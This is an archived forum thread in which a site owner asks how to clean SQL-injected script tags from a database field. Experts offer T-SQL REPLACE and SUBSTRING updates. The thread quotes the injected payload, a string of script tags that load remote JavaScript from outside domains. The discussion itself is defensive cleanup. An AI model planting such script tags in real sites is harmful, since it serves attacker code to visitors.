Solved

Simple SQL question - delete any occurence in a single field

Posted on 2008-06-26
14
277 Views
Last Modified: 2010-04-21
Hi, I have a MSSQL db. I have been hit with a SQL Injection attack. I have someone trying to shore it up for me, but in the meantime, how can i simply delete any occurence of this:

<script src=http://www.app52.com/b.js></script><script src=http://www.dbupdr.com/b.js></script><script src=http://www.dbupdr.com/b.js></script><script src=http://www.rid34.com/b.js></script><script src=http://www.dl251.com/b.js></script>

it is at the end of every "Description" field in my Items table.

I don't know much about SQL at all, but wondered if you can tell me how I can at least delete the code so my site will run in the meantime while he's trying to find a permanent solution to limit our vulnerability.

I wanted this developer to do it, but so far I'm not too confident in his abilities.

Thanks much.
0
Comment
Question by:Cindy0904
  • 7
  • 3
  • 2
  • +1
14 Comments
 
LVL 60

Accepted Solution

by:
chapmandew earned 100 total points
ID: 21877386
you could do this several times for each snippet above:

update tablename
set description = replace(description, '<script src=http://www.app52.com/b.js></script>', '')
0
 
LVL 19

Expert Comment

by:folderol
ID: 21877439
update tablename
set description = substring(description, 1, charindex('<script src', description)-1)
0
 

Author Comment

by:Cindy0904
ID: 21877930
thanks for the responses. folderol, I don't even know enough to understand what you mean. Can you add the exact code?

Is this right? Since my table name is Items? I'm afraid and want to make sure i don't mess it up worse.

update Items
set description = substring(description, 1, charindex('<script src', description)-1)

Thanks a lot!
0
 
LVL 60

Expert Comment

by:chapmandew
ID: 21877948
looks right to me.
0
 

Author Comment

by:Cindy0904
ID: 21878011
Hmm, here's what i get when I tried it:

Server Error in '/MSSQL' Application.
--------------------------------------------------------------------------------

A potentially dangerous Request.Form value was detected from the client (sqlstmt="...harindex('<script src', descri...").
Description: Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.

Exception Details: System.Web.HttpRequestValidationException: A potentially dangerous Request.Form value was detected from the client (sqlstmt="...harindex('<script src', descri...").

Source Error:

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:

1. Add a "Debug=true" directive at the top of the file that generated the error. Example:

  <%@ Page Language="C#" Debug="true" %>

or:

2) Add the following section to the configuration file of your application:

<configuration>
   <system.web>
       <compilation debug="true"/>
   </system.web>
</configuration>

Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.

Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.  
0
 
LVL 19

Expert Comment

by:folderol
ID: 21878103
I am not familiar enough with SQL programming security to be much help, but if you are getting this message in Query Analyzer, and you suspect a lot of table damage, you might have to create a new database and write the good data to it using insert.  Then truncate or drop the old tables and copy the tables back.

This is a super conservative approach anyway, since with this way you don't need backups.  You never update the original tables until you have a working, satisfactory copy.  Your case may not require such thoroughness.

As a test, do

select substring(description, 1, charindex('<script src', description)-1) as description
from items into #tmp_items

select * from #tmp_items

See if the same error occurs.  This won't prove anything really, since someone else may have advice about how to make the update work.
0
 
LVL 19

Assisted Solution

by:folderol
folderol earned 100 total points
ID: 21878113
Sorry, typo....

select substring(description, 1, charindex('<script src', description)-1) as description
into #tmp_items
from items
select * from #tmp_items
0
Better Security Awareness With Threat Intelligence

See how one of the leading financial services organizations uses Recorded Future as part of a holistic threat intelligence program to promote security awareness and proactively and efficiently identify threats.

 

Author Comment

by:Cindy0904
ID: 21878521
i just keep getting the same error message as above...
0
 

Author Comment

by:Cindy0904
ID: 21878695
can i pay one of you to go in and remove the code so our site would work? Until we can secure it, it may be back, but if you can then tell me the code to delete it, that would help till the permanent fix.
I'm desperate. Every minute costs money. thanks.
0
 
LVL 8

Expert Comment

by:pzozulka
ID: 21879795
What about back ups of the DB. It would definetly be a quick fix. Just re upload the latest copy of your website and the latest copy of your database.
0
 

Author Comment

by:Cindy0904
ID: 21879823
Yes, my brother unfortunately made a lot of changes before the next backup was made, so he didn't want to lose the changes. thanks.
0
 
LVL 8

Assisted Solution

by:pzozulka
pzozulka earned 50 total points
ID: 21879830
If time is of the essence and you don't see a solution in the near future, I would backup everything that I have now, and restore it to a test environment.

In the meantime, restore the latest backup. At least you will have something to work with.
0
 

Author Comment

by:Cindy0904
ID: 21881011
I never could get around that error message, but the developer finally came around and fixed it. Still don't know if it's fixed up to par to guard against future attacks, but I guess we'll backup, backup & wait and see. Thanks for all the help. :)
0
 

Author Closing Comment

by:Cindy0904
ID: 31471105
thanks guys!
0

Featured Post

Free Gift Card with Acronis Backup Purchase!

Backup any data in any location: local and remote systems, physical and virtual servers, private and public clouds, Macs and PCs, tablets and mobile devices, & more! For limited time only, buy any Acronis backup products and get a FREE Amazon/Best Buy gift card worth up to $200!

Join & Write a Comment

Suggested Solutions

Title # Comments Views Activity
T-SQL Using IN with a subquery 3 12
Updating ms sql with special characters 8 23
sql calculate averages 18 25
Slow SQL query 12 17
Introduction SQL Server Integration Services can read XML files, that’s known by every BI developer.  (If you didn’t, don’t worry, I’m aiming this article at newcomers as well.) But how far can you go?  When does the XML Source component become …
In this article I will describe the Backup & Restore method as one possible migration process and I will add the extra tasks needed for an upgrade when and where is applied so it will cover all.
Via a live example, show how to backup a database, simulate a failure backup the tail of the database transaction log and perform the restore.
Using examples as well as descriptions, and references to Books Online, show the documentation available for datatypes, explain the available data types and show how data can be passed into and out of variables.

706 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now